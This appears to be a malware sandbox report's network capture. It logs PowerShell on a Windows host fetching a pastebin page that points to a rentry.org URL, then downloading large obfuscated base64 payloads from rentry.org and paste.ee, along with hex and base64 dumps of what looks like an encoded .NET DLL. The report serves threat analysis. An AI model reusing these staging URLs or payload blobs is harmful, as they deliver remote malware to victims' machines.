                                                                                              2024-10-31 06:41:11 UTC16384INData Raw: 41 51 43 49 41 45 42 41 41 42 5a 6c 46 51 71 45 7a 41 45 41 46 4d 41 41 41 41 2b 41 41 41 52 66 71 51 41 41 41 51 43 4b 41 49 41 41 43 73 4b 42 68 59 76 42 51 5a 6d 46 31 6b 4b 41 77 59 67 41 51 45 41 41 46 68 55 4b 78 49 48 52 51 4d 41 41 41 41 45 41 41 41 41 45 77 41 41 41 43 41 41 41 41 41 57 43 79 76 71 42 41 4a 2b 70 41 41 41 42 41 61 55 57 56 51 58 43 79 76 62 42 58 36 6c 41 41 41 45 42 70 52 55 47 41 73 72 7a 69 6f 41 45 7a 41 45 41 45 30 41 41 41 41 2b 41 41 41 52 66 71 59 41 41 41 51 43 4b 41 49 41 41 43 73 4b 42 68 59 76 42 51 5a 6d 46 31 6b 4b 41 77 5a 55 4b 78 49 48 52 51 4d 41 41 41 41 45 41 41 41 41 45 51 41 41 41 43 41 41 41 41 41 58 43 79 76 71 42 58 36 6e 41 41 41 45 42 70 52 55 47 41 73 72 33 51 51 43 66 71 59 41 41 41 51 47 6c 46 6c 55
                                                                                              Data Ascii: AQCIAEBAABZlFQqEzAEAFMAAAA+AAARfqQAAAQCKAIAACsKBhYvBQZmF1kKAwYgAQEAAFhUKxIHRQMAAAAEAAAAEwAAACAAAAAWCyvqBAJ+pAAABAaUWVQXCyvbBX6lAAAEBpRUGAsrzioAEzAEAE0AAAA+AAARfqYAAAQCKAIAACsKBhYvBQZmF1kKAwZUKxIHRQMAAAAEAAAAEQAAACAAAAAXCyvqBX6nAAAEBpRUGAsr3QQCfqYAAAQGlFlU
                                                                                              2024-10-31 06:41:11 UTC16384INData Raw: 77 42 6f 41 41 41 42 45 41 43 54 44 67 41 41 65 41 42 5a 41 47 67 41 41 41 41 51 41 4b 67 4f 41 41 43 41 41 46 73 41 62 67 41 41 41 52 41 41 74 68 41 41 41 48 67 41 58 51 42 31 41 41 41 42 45 41 43 64 45 77 41 41 65 41 42 66 41 48 73 41 41 41 45 51 41 47 4d 55 41 41 42 34 41 46 38 41 66 77 43 41 41 42 41 41 66 68 51 41 41 49 41 41 58 77 43 44 41 41 41 41 45 41 43 54 46 41 41 41 67 41 42 67 41 49 73 41 41 41 41 51 41 4b 6f 55 41 41 43 55 41 47 45 41 6a 77 41 41 41 42 41 41 32 68 51 41 41 41 6b 41 5a 51 43 67 41 41 41 41 45 41 44 51 46 51 41 41 43 51 42 6d 41 4b 49 41 41 41 45 41 41 4f 55 56 41 41 44 56 41 47 30 41 6f 77 41 41 41 42 41 41 6e 67 45 41 41 4a 51 41 63 41 43 6a 41 41 41 41 45 41 44 48 41 51 41 41 43 51 42 30 41 4b 67 41 41 41 41 51 41 4f 59 42
                                                                                              Data Ascii: wBoAAABEACTDgAAeABZAGgAAAAQAKgOAACAAFsAbgAAARAAthAAAHgAXQB1AAABEACdEwAAeABfAHsAAAEQAGMUAAB4AF8AfwCAABAAfhQAAIAAXwCDAAAAEACTFAAAgABgAIsAAAAQAKoUAACUAGEAjwAAABAA2hQAAAkAZQCgAAAAEADQFQAACQBmAKIAAAEAAOUVAADVAG0AowAAABAAngEAAJQAcACjAAAAEADHAQAACQB0AKgAAAAQAOYB
                                                                                              2024-10-31 06:41:11 UTC16384INData Raw: 41 41 41 41 41 41 41 41 51 44 71 43 77 41 41 41 41 41 4b 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 4b 41 41 30 43 41 41 41 41 41 41 41 41 41 41 41 42 41 41 41 41 78 78 45 41 41 4c 67 41 41 41 41 43 41 41 41 41 58 67 45 41 41 41 55 41 42 41 41 47 41 41 51 41 44 77 41 4f 41 42 41 41 44 77 41 52 41 41 34 41 4c 77 41 75 41 44 4d 41 4d 67 41 30 41 44 49 41 4f 67 41 35 41 44 73 41 4f 51 41 38 41 44 6b 41 41 41 41 51 41 41 77 41 74 41 45 41 41 42 41 41 47 51 43 30 41 51 41 41 41 41 41 62 41 4c 51 42 48 51 41 72 41 65 38 42 32 41 37 78 41 53 38 50 41 41 41 41 54 47 52 6a 58 30 6b 30 58 7a 41 41 54 47 52 73 62 32 4e 66 4d 41 42 54 64 47 78 76 59 31 38 77 41 45 78 6b 59 58 4a 6e 58 7a 41 41 55 30 68 42 4d 51 42 4d 5a 47 4e 66 53 54 52 66 54 54 45 41 54 47 52 6a
                                                                                              Data Ascii: AAAAAAAAQDqCwAAAAAKAAAAAAAAAAAAAAAKAA0CAAAAAAAAAAABAAAAxxEAALgAAAACAAAAXgEAAAUABAAGAAQADwAOABAADwARAA4ALwAuADMAMgA0ADIAOgA5ADsAOQA8ADkAAAAQAAwAtAEAABAAGQC0AQAAAAAbALQBHQArAe8B2A7xAS8PAAAATGRjX0k0XzAATGRsb2NfMABTdGxvY18wAExkYXJnXzAAU0hBMQBMZGNfSTRfTTEATGRj
                                                                                              2024-10-31 06:41:11 UTC1003INData Raw: 51 41 41 41 46 51 41 5a 51 42 6f 41 48 55 41 62 41 42 6a 41 47 67 41 5a 51 42 7a 41 46 67 41 65 41 42 59 41 48 67 41 65 41 41 75 41 47 51 41 62 41 42 73 41 41 41 41 41 41 41 38 41 41 34 41 41 51 42 51 41 48 49 41 62 77 42 6b 41 48 55 41 59 77 42 30 41 45 34 41 59 51 42 74 41 47 55 41 41 41 41 41 41 45 4d 41 62 41 42 68 41 48 4d 41 63 77 42 4d 41 47 6b 41 59 67 42 79 41 47 45 41 63 67 42 35 41 44 4d 41 41 41 41 30 41 41 67 41 41 51 42 51 41 48 49 41 62 77 42 6b 41 48 55 41 59 77 42 30 41 46 59 41 5a 51 42 79 41 48 4d 41 61 51 42 76 41 47 34 41 41 41 41 78 41 43 34 41 4d 41 41 75 41 44 41 41 4c 67 41 77 41 41 41 41 4f 41 41 49 41 41 45 41 51 51 42 7a 41 48 4d 41 5a 51 42 74 41 47 49 41 62 41 42 35 41 43 41 41 56 67 42 6c 41 48 49 41 63 77 42 70 41 47 38 41
                                                                                              Data Ascii: QAAAFQAZQBoAHUAbABjAGgAZQBzAFgAeABYAHgAeAAuAGQAbABsAAAAAAA8AA4AAQBQAHIAbwBkAHUAYwB0AE4AYQBtAGUAAAAAAEMAbABhAHMAcwBMAGkAYgByAGEAcgB5ADMAAAA0AAgAAQBQAHIAbwBkAHUAYwB0AFYAZQByAHMAaQBvAG4AAAAxAC4AMAAuADAALgAwAAAAOAAIAAEAQQBzAHMAZQBtAGIAbAB5ACAAVgBlAHIAcwBpAG8A


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              2192.168.2.449732104.20.3.235443980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-10-31 06:41:14 UTC74OUTGET /raw/4B83LcVU HTTP/1.1
                                                                                              Host: pastebin.com
                                                                                              Connection: Keep-Alive
                                                                                              2024-10-31 06:41:15 UTC391INHTTP/1.1 200 OK
                                                                                              Date: Thu, 31 Oct 2024 06:41:15 GMT
                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              x-frame-options: DENY
                                                                                              x-content-type-options: nosniff
                                                                                              x-xss-protection: 1;mode=block
                                                                                              cache-control: public, max-age=1801
                                                                                              CF-Cache-Status: EXPIRED
                                                                                              Last-Modified: Thu, 31 Oct 2024 06:41:15 GMT
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8db1a884fa706b5b-DFW
                                                                                              2024-10-31 06:41:15 UTC37INData Raw: 31 66 0d 0a 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 6f 72 67 2f 73 68 71 6d 36 67 39 70 2f 72 61 77 0d 0a
                                                                                              Data Ascii: 1fhttps://rentry.org/shqm6g9p/raw
                                                                                              2024-10-31 06:41:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              3192.168.2.449733164.132.58.105443980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-10-31 06:41:16 UTC72OUTGET /shqm6g9p/raw HTTP/1.1
                                                                                              Host: rentry.org
                                                                                              Connection: Keep-Alive
                                                                                              2024-10-31 06:41:16 UTC320INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Thu, 31 Oct 2024 06:41:16 GMT
                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                              Content-Length: 270652
                                                                                              Connection: close
                                                                                              Vary: Origin
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                              Cache-Control: Vary
                                                                                              2024-10-31 06:41:16 UTC16064INData Raw: 3d e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93
                                                                                              Data Ascii: =
                                                                                              2024-10-31 06:41:16 UTC16384INData Raw: 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93
                                                                                              Data Ascii:
                                                                                              2024-10-31 06:41:17 UTC16384INData Raw: 93 94 51 5a e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 43 e2 93 94 e2 93 94 e2 93 94 73 42 51 5a e2 93 94 e2 93 94 e2 93 94 49 47 e2 93 94 e2 93 94 e2 93 94 68 42 67 59 5a e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 39 42 e2 93 94 e2 93 94 e2 93 94 4d e2 93 94 e2 93 94 e2 93 94 73 48 e2 93 94 e2 93 94 e2 93 94 67 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 4f e2 93 94 e2 93 94 e2 93 94 55 47 e2 93 94 e2 93 94 e2 93 94 67 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 62 e2 93 94 e2 93 94 e2 93 94 55 47 e2 93 94 e2 93 94 e2 93 94 69 42 51 59 e2 93 94 e2 93 94 e2 93 94 49 57 47 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 49 e2 93 94 e2 93 94 e2 93 94 77 53
                                                                                              Data Ascii: QZCsBQZIGhBgYZ9BMsHgOUGgbUGiBQYIWGIwS
                                                                                              2024-10-31 06:41:17 UTC16384INData Raw: 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 62 43 51 36 e2 93 94 e2 93 94 e2 93 94 49 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 5a 43 e2 93 94 e2 93 94 e2 93 94 36 e2 93 94 e2 93 94 e2 93 94 49 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 58 43 77 35 e2 93 94 e2 93 94 e2 93 94 45 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 58 43 67 35 e2 93 94 e2 93 94 e2 93 94 49 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 56 43 77 34 e2 93 94 e2 93 94 e2 93 94 45 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 56 43 67 34 e2 93 94 e2 93 94 e2 93 94 49 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 54 43 51 34 e2 93 94 e2 93 94 e2 93 94 49 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 52 43 e2 93 94 e2 93
                                                                                              Data Ascii: bCQ6IZC6IXCw5EXCg5IVCw4EVCg4ITCQ4IRC
                                                                                              2024-10-31 06:41:17 UTC16384INData Raw: e2 93 94 61 e2 93 94 e2 93 94 e2 93 94 55 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 49 51 2f e2 93 94 e2 93 94 e2 93 94 51 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 49 e2 93 94 e2 93 94 e2 93 94 49 e2 93 94 e2 93 94 e2 93 94 4d e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 45 e2 93 94 e2 93 94 e2 93 94 7a e2 93 94 e2 93 94 e2 93 94 49 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 45 67 70 e2 93 94 e2 93 94 e2 93 94 45 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 45 e2 93 94 e2 93 94 e2 93 94 7a e2 93 94 e2 93 94 e2 93 94 49 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93
                                                                                              Data Ascii: aUIQ/QIIMEzIEgpEEzI
                                                                                              2024-10-31 06:41:17 UTC16384INData Raw: 37 e2 93 94 e2 93 94 e2 93 94 78 62 55 51 4c e2 93 94 e2 93 94 e2 93 94 42 43 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 67 6a 55 46 51 4f 51 67 45 46 49 43 51 6b e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 30 49 35 42 63 44 45 53 52 52 65 e2 93 94 e2 93 94 e2 93 94 45 4a e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 4e 79 62 e2 93 94 e2 93 94 e2 93 94 31 e2 93 94 e2 93 94 e2 93 94 42 53 55 51 47 e2 93 94 e2 93 94 e2 93 94 52 43 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93
                                                                                              Data Ascii: 7xbUQLBCgjUFQOQgEFICQk0I5BcDESRReEJNyb1BSUQGRC
                                                                                              2024-10-31 06:41:17 UTC16384INData Raw: 93 94 e2 93 94 55 55 42 61 4f 67 64 42 59 4d e2 93 94 e2 93 94 e2 93 94 44 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 43 56 51 6a 44 e2 93 94 e2 93 94 e2 93 94 59 e2 93 94 e2 93 94 e2 93 94 47 44 77 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 51 51 46 51 34 e2 93 94 e2 93 94 e2 93 94 46 47 67 78 e2 93 94 e2 93 94 e2 93 94 4d e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2
                                                                                              Data Ascii: UUBaOgdBYMDCVQjDYGDwQQFQ4FGgxM
                                                                                              2024-10-31 06:41:17 UTC16384INData Raw: 93 94 e2 93 94 59 77 43 76 58 67 34 e2 93 94 e2 93 94 e2 93 94 59 77 45 31 4f 51 4d e2 93 94 e2 93 94 e2 93 94 59 77 45 31 47 68 7a e2 93 94 e2 93 94 e2 93 94 59 77 45 31 2b 51 4b e2 93 94 e2 93 94 e2 93 94 59 77 43 76 33 e2 93 94 e2 93 94 e2 93 94 38 e2 93 94 e2 93 94 e2 93 94 59 e2 93 94 e2 93 94 e2 93 94 44 37 2f 77 64 e2 93 94 e2 93 94 e2 93 94 59 e2 93 94 e2 93 94 e2 93 94 44 37 2f 51 57 e2 93 94 e2 93 94 e2 93 94 59 e2 93 94 e2 93 94 e2 93 94 44 37 4c 68 5a e2 93 94 e2 93 94 e2 93 94 59 e2 93 94 e2 93 94 e2 93 94 44 37 37 77 54 e2 93 94 e2 93 94 e2 93 94 59 e2 93 94 e2 93 94 e2 93 94 44 37 37 67 57 e2 93 94 e2 93 94 e2 93 94 59 77 45 31 75 e2 93 94 e2 93 94 e2 93 94 55 e2 93 94 e2 93 94 e2 93 94 59 e2 93 94 e2 93 94 e2 93 94 44 37 37 e2 93 94 e2 93
                                                                                              Data Ascii: YwCvXg4YwE1OQMYwE1GhzYwE1+QKYwCv38YD7/wdYD7/QWYD7LhZYD77wTYD77gWYwE1uUYD77
                                                                                              2024-10-31 06:41:17 UTC16384INData Raw: 72 51 77 45 58 73 69 4d 45 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 64 76 6e e2 93 94 e2 93 94 e2 93 94 46 51 2b 4b 45 4d 68 46 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 34 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 77 43 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 77 45 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 46 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 51 51 52 45 45 78 46 72 51 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2
                                                                                              Data Ascii: rQwEXsiMEdvnFQ+KEMhF4wCwEFQQREExFrQ
                                                                                              2024-10-31 06:41:17 UTC16384INData Raw: 93 94 e2 93 94 e2 93 94 44 42 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 6f 48 e2 93 94 e2 93 94 e2 93 94 46 e2 93 94 e2 93 94 e2 93 94 7a 45 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 67 4b 45 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 33 58 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 42 4e 43 78 48 43 6f e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 38 e2 93 94 e2 93 94 e2 93 94 4b 43 49 6c 4b 55 4f e2 93 94 e2 93 94 e2 93 94 42 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 77 37 4a 67 4a 71 51 e2 93 94 e2 93
                                                                                              Data Ascii: DBoHFzEgKE3XBNCxHCo8KCIlKUOBw7JgJqQ


                                                                                              Session ID:4
                                                                                              Source IP:192.168.2.4
                                                                                              Source Port:49736
                                                                                              Destination IP:188.114.97.3
                                                                                              Destination Port:443
                                                                                              PID:980
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Timestamp:2024-10-31 06:41:18 UTC
                                                                                              Bytes transferred:67
                                                                                              Direction:OUT
                                                                                              Data:GET /d/Rrk2f/0 HTTP/1.1
                                                                                              Host: paste.ee
                                                                                              Connection: Keep-Alive
                                                                                              Timestamp:2024-10-31 06:41:19 UTC
                                                                                              Bytes transferred:1232
                                                                                              Direction:IN
                                                                                              Data:HTTP/1.1 200 OK
                                                                                              Date: Thu, 31 Oct 2024 06:41:19 GMT
                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Cache-Control: max-age=2592000
                                                                                              strict-transport-security: max-age=63072000
                                                                                              x-frame-options: DENY
                                                                                              x-content-type-options: nosniff
                                                                                              x-xss-protection: 1; mode=block
                                                                                              content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DZKapLqnpI4OWlHgJn7lKhzhXRQyP5AtnIBZEKoV%2BPdwtXU3HM9RoeaQf1V%2FwO2tlJzkbw%2F8AqBHvjCySJWJGgoA0EgKZh1LakwxerN86rDtTkzOjl1ZnT2KUw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8db1a89d2d083ab6-DFW
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              2024-10-31 06:41:19 UTC190INData Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 31 31 39 26 73 65 6e 74 3d 34 26 72 65 63 76 3d 36 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 31 36 26 72 65 63 76 5f 62 79 74 65 73 3d 36 38 31 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 32 35 33 31 34 36 38 26 63 77 6e 64 3d 32 35 31 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 34 31 30 63 63 30 34 37 34 37 39 31 32 31 37 62 26 74 73 3d 33 31 35 26 78 3d 30 22 0d 0a 0d 0a
                                                                                              Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=1119&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2816&recv_bytes=681&delivery_rate=2531468&cwnd=251&unsent_bytes=0&cid=410cc0474791217b&ts=315&x=0"
                                                                                              2024-10-31 06:41:19 UTC1316INData Raw: 31 66 37 66 0d 0a 3d 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 38 67 4b 50 49 79 44 62 38 77 45 50 73 77 44 43 37 77 2f 4f 63 76 44 73 37 51 35 4f 30 74 44 56 37 41 7a 4f 51 6f 44 37 36 77 73 4f 73 71 44 6a 36 77 6d 4f 45 70 44 4b 36 41 68 4f 49 6f 44 42 36 41 51 4f 38 6e 44 2b 35 51 66 4f 67 4f 44 4e 7a 41 6a 4d 6b 4b 44 6f 79 51 6f 4d 41 4b 44 66 79 41 6e 4d 59 4a 44 53 79 67 6a 4d 6f 49 44 47 78 67 65 4d 59 48 44 31 78 41 64 4d 4d 48 44 79 78 51 63 4d 41 48 44 76 78 67 62 4d 73 47 44 71 78 51 61 4d 67 47 44 6e 78 67 5a 4d 55 47 44 6b 78 77 59 4d 49 47 44 65 78
                                                                                              Data Ascii: 1f7f==AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8gKPIyDb8wEPswDC7w/OcvDs7Q5O0tDV7AzOQoD76wsOsqDj6wmOEpDK6AhOIoDB6AQO8nD+5QfOgODNzAjMkKDoyQoMAKDfyAnMYJDSygjMoIDGxgeMYHD1xAdMMHDyxQcMAHDvxgbMsGDqxQaMgGDnxgZMUGDkxwYMIGDex
                                                                                              2024-10-31 06:41:19 UTC1369INData Raw: 44 4f 34 51 78 4e 38 66 44 2b 33 67 2b 4e 51 66 44 6d 33 67 34 4e 73 64 44 61 33 67 30 4e 45 64 44 51 33 77 44 41 41 41 41 4d 41 59 41 6b 41 59 44 51 32 77 54 4e 41 58 44 76 31 67 62 4e 30 57 44 73 31 77 61 4e 6f 57 44 6e 31 67 5a 4e 55 57 44 6b 31 77 59 4e 49 57 44 68 31 41 59 4e 38 56 44 65 31 51 58 4e 77 56 44 62 31 67 57 4e 6b 56 44 59 31 77 56 4e 59 56 44 56 31 41 56 4e 4d 56 44 53 31 51 55 4e 41 56 44 50 31 67 54 4e 30 55 44 4d 31 77 53 4e 6f 55 44 4a 31 41 53 4e 63 55 44 47 31 51 52 4e 51 55 44 44 31 67 51 4e 45 55 44 41 30 77 50 4e 34 54 44 39 30 41 50 4e 73 54 44 36 30 51 4f 4e 67 54 44 33 30 67 4e 4e 55 44 41 41 41 41 49 41 47 41 48 41 7a 67 35 4d 51 4f 44 69 7a 41 34 4d 34 4e 44 63 7a 67 32 4d 67 4e 44 57 7a 41 31 4d 49 4e 44 51 7a 67 7a 4d 77
                                                                                              Data Ascii: DO4QxN8fD+3g+NQfDm3g4NsdDa3g0NEdDQ3wDAAAAMAYAkAYDQ2wTNAXDv1gbN0WDs1waNoWDn1gZNUWDk1wYNIWDh1AYN8VDe1QXNwVDb1gWNkVDY1wVNYVDV1AVNMVDS1QUNAVDP1gTN0UDM1wSNoUDJ1ASNcUDG1QRNQUDD1gQNEUDA0wPN4TD90APNsTD60QONgTD30gNNUDAAAAIAGAHAzg5MQODizA4M4NDczg2MgNDWzA1MINDQzgzMw
